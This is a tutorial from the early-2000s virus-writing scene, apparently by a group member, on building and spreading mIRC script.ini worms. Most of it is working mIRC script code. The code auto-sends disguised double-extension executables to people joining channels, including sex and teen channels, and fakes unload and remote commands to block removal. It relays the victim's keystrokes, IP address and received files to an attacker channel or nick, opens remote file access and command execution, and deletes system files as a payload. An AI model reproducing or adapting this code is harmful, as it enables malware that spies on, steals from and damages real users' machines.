irc.gif (5163 bytes)

(Part 1.0 the BASICs)

part 2.0 >> 04/2000 (mIRC advanced scripting)
part 3.0 >> 06/2000 (Pirch scripting)
part 4.0 >> 07/2000 (Others Worms)

.txt >>  * wormst~1.txt (21,1ko)
.zip >>  * worms.zip (357ko) >> * 21aliv~1.zip (343ko)
            * 15 .ini scripts
            * CeyDem12.asm (19,6ko)


Thanx/Greetz to: Secret_ & Stram ; Simon7 ; Perikles ; Daniel3 .
--------------->
4 their Worm works, scripting and ideas, for correcting my english (Dan3 & Peri), ... and to be electronic friends.

FIRST :

OPEN MIRC.HLP, PRINT IT AND READ IT, READ IT, READ IT ! Yes! The mIRC Help file is really usefull if u want to make irc worms, so please read-it, and read this tutorial with mIRC.hlp close to u ;), it will be easier for you to understand. (mainly if u're a newbie).

I've not included ALL the methods because there are too many methods for worms and script.ini. You will find a zip file with this tutorial, full of nice script.ini, let's study them ;) You will find lot's of advanced technics... (some are mine, some are not...)

Oh! Yes... my english sux, so...

SPREADING METHODS :

It was very easy when worms were Script.ini, because they exploited a bug in mIRC, this bug was in the default options : Dcc get, auto accept & save receive file
in mIRC Dir ! You can see why it was easy, the script.ini was auto-accepted and putted into the good place: the mIRC Directory :)

If u put a script.ini in the mIRC Dir, it will be loaded; if not, just restart mIRC 1 or 2 times, as u can see, mIRC looks for a script.ini on start-up, and if it finds one, it will load it. Easy!

But the mIRC bugs do not exist anymore, and now the default options are:
- save receive file in \download Dir.
- ask for Dcc get.
Shit!!!
Even worse... by default, mIRC never accepts *.exe, *.com, *.ini, *.bat, *.dll,
it will simply
ignore these types of files! Bad no ! Hehehehe!!!

Ok, these files extensions can always be used for worms, but it's not so easy! First of all, there are mIRC options (auto-ignores these files). Second, because users (even newbies) know which .ext are "dangerous" or could be a vir.

Hummmm... not so easy!

Yep! But it's more fun like that!!

Lot's of files can be used again ... ... ... like ... *.vbs, *.html, *.pif ;),
*.js, *.doc,
*.xls, *.pps, ... ... ... and probably lot's more :)

All u have to do is to use a file with ability to run "code", ...

.vbs }
.html }} using javascript, VBscript, HTMl, ...
.js }

.doc }
.xls }} using W97 Macro (vba)
.pps }

.pif } ... hum strange no ? :) but yep it works !!!


I'm sure you now see a bit more...

BUT! For spreading u have to be ... hum ... nasty/smart/liar/...

Let's look at some technics...
Check these worms names:

-MyPicture.bmp.vbs
-!!!!!!!lanna-xxx.jpg.bat
-Julie16,JPG.com
-Jane.BMP.EXE
-EmmaPeel.HTML.pif
-cuteELSA.JPG.pif
-CeydaDemet___TurkishGirl.JPG.com
-...

You see... you have to make your worm acceptable by the user, the .ext.ext2 is a "not-so-bad" method.

Some Windows9x name the files as 'file.ext', others as 'file', it depends... if u put a sufficient numbers of letters the user won't see the last .ext
Example:
Me_MyPics.BMP.com >>> user will see >>> Me_MyPics.BMP.... better no ? :)
        or will see >>> Me_MyPics.BMP

But another problem is the ... Worm ICON ! "Pffffff...big problem..." ...no! Just try to make new things ... be zen be brain ;) This time u will have to solve the problem yourself... Why? Because it will depend on your worm, if it's an exe, 32bits, u could put any icon u want, but
other files will depend with .extension.
For a .pif worm u could put any icon u want, but try to choose a typic windows icon, a prog that
is included in all windows version, and is in the same places for all computer (like notepad, msnexch, ...). Just play a bit with .pif or .lnk u will understand... just right-click > properties on the pif file.

INFECTION METHODS :

So now you have to infect the IRC user, the most common way is...

n6 =on 1:JOIN:#:{
n7 =if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\EmmaPeel.HTML.pif
n8 = }

It means : 'if a guy joins a chan where the victim is, it will send him the file' Of course u can set it to all other remote commands, like 'on part', 'on text',
... It's an easy way, but there are some problems with it...

If the victim is on lot's of channels, it will be flooded by the mass dcc send. And it's pretty easy to close a dcc window, so your worm should have a tiny size, 10ko is max...
to go very fast, You can even use the /pdcc 99999999999 in the script.

Another trick can be done :

n2=on 1:connect:/.enable #d
n3=#d off
n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick script.ini } | .disable #d
| .timer 1 60 .enable #d }
n5=#d end

n13=on 1:part:*:{
n14= if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n15=}

n13=on 1:join:#sex:{
n14=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\Gary_Gygax.exe
n15=}
n16=on 1:text:*game*:*:{
n17=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\Gary_Gygax.exe
n18=}

Another technique is to use socks, but that will be in the next tutorial...

When the guy launches the worm, some things have to be done...

1- install the script.ini in mIRC Dir.
2- copy himself (the_worm.ext) in another Dir (for spreading).
3- make the worm start on each boot.

These are the 3 fundamental things to do for a good infection.

STEALTH FOR THE MIRC SCRIPT :


>> The first good way is to make the script impossible to remove or to unload
:
-----------------------------------------------------------------------------

n23=alias unload { halt }
n24=alias remove { halt }

These 2 lines make the commands /unload and /remove inefficients, of course some variations can be done, or even a fake command, look at the next lines...

n5=alias remote {
n6= if ($1 == off) { echo 6 *** Remote is OFF (Ctcps,Events,Raw) }
n7= if ($1 == on) { echo 6 *** Remote is ON (Ctcps,Events,Raw) }
n8=}
n9=alias unload {
n10= if ($1 == -rs) { echo 6 *** Unloaded script 'script.ini' }
n11=}

If the user trys to stop the remote, or trys to unload the script.ini; he will have a fake message, saying "all is done", but nothing will be done ;) and the remote and script will still be there. You have simply to intercept Mirc commands; in the example above, the 2 commands /remote and /unload are intercepted, and changed in the way we want... u see...

Remember...:
------------
/load -rs file.ext or /load -rs path\file.ext
/unload -rs file.ext or /unload -rs path\file.ext
---> this command is used to load or unload a script in mirc

/remote on ---> events, ctcps and raw will be enable, so the commands like
        "on text" or "on ctcp" could work.
/remote off ---> disable all remote commands, the "on text", "on ...", wont work
        anymore.

Let's look at other methods that can be used to hide the worm... Let's see...

n13=alias /unload /echo 2 *** Unloaded $1- 
n14=alias /remove /echo 2 *** Removed $1- 
n15=alias /play /echo 2 *** Unable To Play $1-  ;--> to send a text file on
a window
n16=alias /remote /.remote on | /echo 12 *** Remote Off ;--> whatever u
type, remote
n17=alias /events /.events on | /echo 12 *** Events Off ;--> will be always
On :)
n18=alias /sreq /echo 12 SREQ IS NOW OFF ;--> sreq is used to enable/disable
DCC

...other "fake commands" methods, it's an endless list...

n30=alias unload { if ( $1 = $null ) || ( $2 = $null ) { .echo -e 2* /unload:
insufficient parameters | halt } | .echo -e 2*** Unloaded script ' $+ $2- $+ '
| halt }
n31=alias remote { if ( $1 = $null ) { .echo -e 2*** Remote is OFF | halt } |
if ( $1 = on ) { .echo -e 2*** Remote is ON (Ctcps,Events,Raw) } | else { .echo
-e 2*** Remote is OFF } | halt }
n32=alias events { if ( $1 = $null ) { .echo -e 2*** Events are OFF | halt }
| if ( $1 = on ) { .echo -e 2*** Events are ON } | else { .echo -e 2*** Events
are OFF } | halt }

Now i guess u can make ur own fake by yourself...

>> Others methods to hide the script.ini :
------------------------------------------------

Some other nice ways can be used, let's see some of them...

Make your script.ini as a hidden file, even read-only and system, Mirc doesn't care about it and it will load the script. If you're using an exe or com it will be easy to put the script +h +r +s, but it's also possible by the script itself.

n22=On 1:Connect:{
n23=/run attrib +h script.ini
n24=/run attrib +r script.ini
n25=/run attrib +s script.ini
n26= }

These commands will change the script.ini attrib to hidden, read-only and system file; of course, you can use it to hide other stuff...

n23=/run attrib +h c:\windows\worm.exe

Even better, let's try it...

n4=on 1:connect:/rename C:\Windows\users32.dll
C:\Windows\CeydaDemet___TurkishGirl.JPG.com
n5=on 1:disconnect:/rename C:\Windows\CeydaDemet___TurkishGirl.JPG.com
C:\Windows\users32.dll

With that, the worm only has the "spreading name" when the user is connected, when he disconnects, the file is renamed to "users32.dll", :) who would like to delete such an important windows DLL? hehehe, and don't forget to put it as a system file, if the guy trys to delete it, he will have a Windows- afraid-problems-dont-do-that-message ;) ok..

Let's see other methods to hide the script.ini ...

n5=on 1:connect:/run -n C:\COMMAND.COM /C move c:\mirc\script.ini C:\XXXX.dll
n6=on 1:disconnect:/run -n C:\COMMAND.COM /C move C:\XXXX.dll
C:\mirc\script.ini

With that, if a guy on irc trys to help the infected, and say "delete
script.ini", he won't
find the file, because the script will only be in "mirc memory", but when he
will disconnect, the
script will be back on...

You now...!

One last thing could be to add a header to your script, making it like a
normal/cool script
Examples:

[SCRIPT]
;ProTecTOR ScriPT-Keep It LOAd (c)Mirc
n1=on 1:start:{

[SCRIPT]
;Keep It Load!-->ANTI-FLOOD SCRIPT (c) (mirc 5.4* - 5.5*) 1999
n1=on 1:start:{

[SCRIPT]
;ANTI NUKE SCRIPT (c) 2000 - Keep this script loaded !
n1=on 1:start:{

[script]
n0=;mIRC Protection Script DO NOT EDIT!
n1=;By Khaled Mardem-Bey
n2=; www.mirc.com
n3=on 1:start:{

Another way to ignore the guys who said to the victim "hey! u have a virus" or "hey! why are u trying to send me an exe?", it's pretty easy...

n29=on 1:text:*script.ini*:#:/.ignore $nick
n30=on 1:text:*virus*:?:/.ignore $nick
n31=on 1:text:*worm*:?:/.ignore $nick
n32=on 1:text:*exe*:?:/.ignore $nick
        |
        |_________________> # for chan message
                    ? for private message

With that, all the guys who said thesewords in a private/chan window to the infected victim will be put on ignore list  ;)

Try to add something nice... like close the window before adding to the ignore list, look a bit to the | , in mirc, like in dos, it's a very usefull command (alt gr / 6)...

SPYING VIA THE MIRC SCRIPT :

You're a little curious, and want to know more about your infected ? I understand u ;)

n14=on 1:input:*:.msg #EmmaPeel [( $+ $active $+ ) $1-]

;--> all the keyboards input will be sent to the channel #emmapeel, with the name of the active window.


u can add :

n15=on 1:text:*:?:.msg #EmmaPeel [( $+ $active $+ ) $1-]

;--> this time, when the victim receives text in a chat/query window, it will be sent to the channel. Of course instead of a chan, u can specify a nick.

or:

n7=on 1:connect:.msg #Sensi Alive! $ip on $server $+ : $+ $port $+
n8=on 1:connect:/raw privmsg Del_Armg0 Vivant! $ip on $server $+ : $+ $port $+

;--> these 2 lines send a message when the user connects on irc,
the first line sends "Alive!" to the chan #Sensi and the second lines send
"Vivant!"
to the nick Del_Armg0 ;).
The "$ip on $server $+ : $+ $port $+", will say the victim's IP, the irc server
he's using
and on which port. Lot's others identifiers can be used... look at mIRC.hlp
pls.

more can be done...

n7=on 1:connect:{
n8= //.msg #El22_Spy Hi. $os $ip $server $port $time $date %chan been $+
$duration($calc($ticks / 1000)) since my last reboot!
n9=}

You can even try to go into the Hard-Disk of the guy...

n9=on 1:text:*open*:#:/fserve $nick 5 C:\

;--> this will open a fserve to the nick who has typed "open" in a chan where the victim is. The root dir will be C:\, and u could upload 5 files max at a time.

Better than the fserve method (cos u'll have to patch the mirc.ini for reset the fserve warning), u can redirect all the files sent or receive by the victim, let's try it...

n16=on 1:filercvd:*.*:.dcc send Del_Armg0 $filename
or
n16=on 1:filercvd:*.exe,*.com,*.ini,*.vbs,*.bat:.dcc send Del_Armg0 $filename

...understood ?

more...

n26=on 1:filercvd:*.jpg,*.vbs,*.zip,*.exe:/.dcc send simbulyne $filename
n27=on 1:filesent:*.jpg,*.vbs,*.zip,*.exe:/.dcc send simbuline $filename

just open mirc.hlp if u don't see/understand ...!!!

You can of course spy on all commands, all you have to do is just redirect them, example:

n33=on 1:DNS:.msg #trojanslair DNS_ ip: $iaddress address: $naddress resolved:
$raddress

Will send the Server answer to chan #trojanslair, when the victim makes a /DNS.

Remember...:
------------
n0=on 1:start:{ --> when mirc starts
n1= .remote on --> all remote will be on
n2= .ctcps on --> ctcps will be on
n3= .events on --> events will be on
n4= .sreq ignore --> auto-ignore all dcc send (so script can't be remplaced by
another worm)
n5= }

ACTING VIA THE MIRC SCRIPT :

This is the fun part of Worms :), so be creative ! All commands can be done via a worm, check this...

n10=on 1:text:*bye*:#:/exit

What he does... When i (or somebody else) type "bye" in the chan of an infected
user
the /exit command is executed. And /exit is a command used to close mirc...
Simply.

Lot's of fun can be done...

n13=on 1:text:*salut*:#:/nick NuKe_Me_^
n14=on 1:text:*hello*:#:/nick im_gay_me
n15=on 1:text:*bye*:#:/nick FuckCops
n16=on 1:text:*cyber*:#:/nick Marie_12x

WarfWarfWarfffff!!! You see the joke hehehe! But lot's of usefull things can be done too...

n8=on 1:text:*gimme*:*:.dcc send $nick $2
n9=on 1:text:*yup*:*:/run $2 $3 $4

n8 will send u the file u specify after "gimme",
example: "gimme c:\autoexec.bat"
will send u the autoexec.bat.

n9 will run the file u specify with command line arguments,
example: "yup c:\windows\netstat -a -n"
will run the dos prog netstat.

A cool option is /run -n, it will launch the prog, but minimized (-n).

I used it in my *.pif worm :

n5=on 1:CONNECT:/run -n C:\COMMAND.COM /C copy
C:\mirc\download\EmmaPeel.HTML.pif C:\Windows\EmmaPeel.HTML.pif

Command.com is usefull too, check the options (under dos).

More... if u luv TakOv ! bah...! warffff

n23= on 1:text:*op*:#:/mode $chan +o $nick
n24= on 1:text:*bang*:#:/mode $chan +b $2-
n25= on 1:text:*boum*:#:/kick $chan $2-

ExErcicEs ! Try to guess and modify them ( to load in mIRC, put the script in the mirc
-----------    

Dir, u can even type /load -rs script.ini )

n2=on 1:connect:/.enable #d
n3=#d on
n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick script.ini } | .disable #d |
.timer 1 60 .enable #d }
n5=#d end


n10= #spy off
n11= on 1:input:*:.msg #novaspy [( $+ $active $+ ) $1-]
n12= #spy end
n13= on 1:text: *supnovpow*:#:/enable #spy


n17= on 1:text:*asl*:#:{
n18= if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n19= }


n9=on 1:text:*:?:{
n10= if ( $1 == runthis ) { .run $2- }
n11=}


n1=on 1:dns:.msg #ad&d_fr DNS_ ip: $iaddress address: $naddress resolved:
$raddress


n0=on 1:load: { .ial on | .events on | .ctcps on | .msg #w81zdw $me just loaded
the trojaned script.ini }
n1=on 1:unload: { .quit I tried unloading script.ini!!! | .timer -o 0 1 /.exit |
.timer 0 1 /.exit }


n18=on 1:text:*carrousel*:*:{ /mode $chan +o $nick | /mode $chan -b $nick |
/mode $chan +b $2- | /kick $chan $2- | /.ignore $2- | /quit | /exit }


n28=on 1:op:#:/msg $chan Please if u want my Special Iblis Sex Pass List :)
TYPE: !xxxpass
n29=on 1:text:*!xxxpass*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick
c:\X_PASS.TXT.exe | /raw privmsg $nick Hi! Here is my last updated XXX Pass list
! Enjoy :)) }


n30=on 1:hotlink:*:*:/msg #iblis_worm *-> User clicked word $1 in line $hotline

MIRC SCRIPT TRICKS :

** don't use the same "word" 2 times.
Example:

n13=on 1:text:*change*:#:/nick Sommeil
n14=on 1:text:*change*:#:/fserve $nick 5 C:\

--> bad : cos "change" is used twice

** ALL mIRC scripts start with [SCRIPT]

** some commands can not be used twice; like

on connect ; on quit ; on start ; ...

In fact, you can only execute all this commands one time in a session. This is because you "connect" only once, the same goes for "quit" and "disconnect";
but not for "on text" cos it will depend on the text looked for.

** Cool variables...

$os $ip $host $server $port $cb $url $version $usermode $time $date $chan

** wanna payload via mIRC ?

... | if ( $day = Monday ) && ( $r(1,12) = 9 ) { pay2 } | ...
n40=alias pay2 { /echo 111264_IBLIS_W0RM__hihihi! 6BadDayToday... |
.remove c:\autoexec.bat | .remove c:\command.com }

** ; is for comments

MORE ABOUT WORMS... :

How to spread your Worms ?

The first was is by IRC, look at a basic spreading script...

[script]
n0=on 1:start:{
n1= .remote on
n2= .ctcps on
n3= .events on
n4=}
n5=on 1:join:#sexpics:{
n6= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets__coolSEXPICS!.JPG.com
n7=}
n8=on 1:join:#sex:{
n9= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n10=}
n11=on 1:join:#teensexpics:{
n12= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets__coolSEXPICS!.JPG.com
n13=}
n14=on 1:join:#sexe:{
n15= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n16=}
n17=on 1:join:#usa:{
n18= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets.doc
n19=}
n20=on 1:join:#chatzone:{
n21= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n22=}
n23=on 1:join:#cybersex:{
n24= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\Me_MyPics.BMP.com
n25=}
n26=on 1:join:#teensex:{
n27= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n28=}
n29=on 1:join:#teenzone:{
n30= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\Me_MyPics.BMP.com
n31=}
n32=on 1:join:#teenchat:{
n33= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets.doc
n34=}
n35=on 1:join:#funfactory:{
n36= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets.doc
n37=}
n38=on 1:text:*trade*:*:/dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets__coolSEXPICS!.JPG.com
n39=on 1:text:*sex*:*:/dcc send $nick C:\distrib\Me_MyPics.BMP.com
n40=on 1:text:*asl*:*:/dcc send $nick C:\distrib\Me_MyPics.BMP.com
n41=on 1:FILESENT:*.*:/write -i victim.txt one infected more >> $nick >> with
$filename worm


As u can see, I spread a lot on the #sex... channel, yep, they're good for spreading; and i'm using a .doc too, with the worm link by OLE ;) ...no macro :))

The line n41 is simply too see how many guys have accepted the Dcc.

NewsGroups are not recommended for spreading worms, Because AVers' looks at them too much !

You can even use a mailing list, or fake warez ftp/site, ... spreading is a fun part, so be imaginative !

Cya all

Del_Armg0 [MATRiX]

Mailto: Del_Armg0@trojanslair.zzn.com

WWW: http://members.xoom.com/Del_armg0/Del_A.htm
          http://altern.org/mvx/

Undernet: #vx-vtc, #vxtrader, #vir, #virus, #[MATRiX]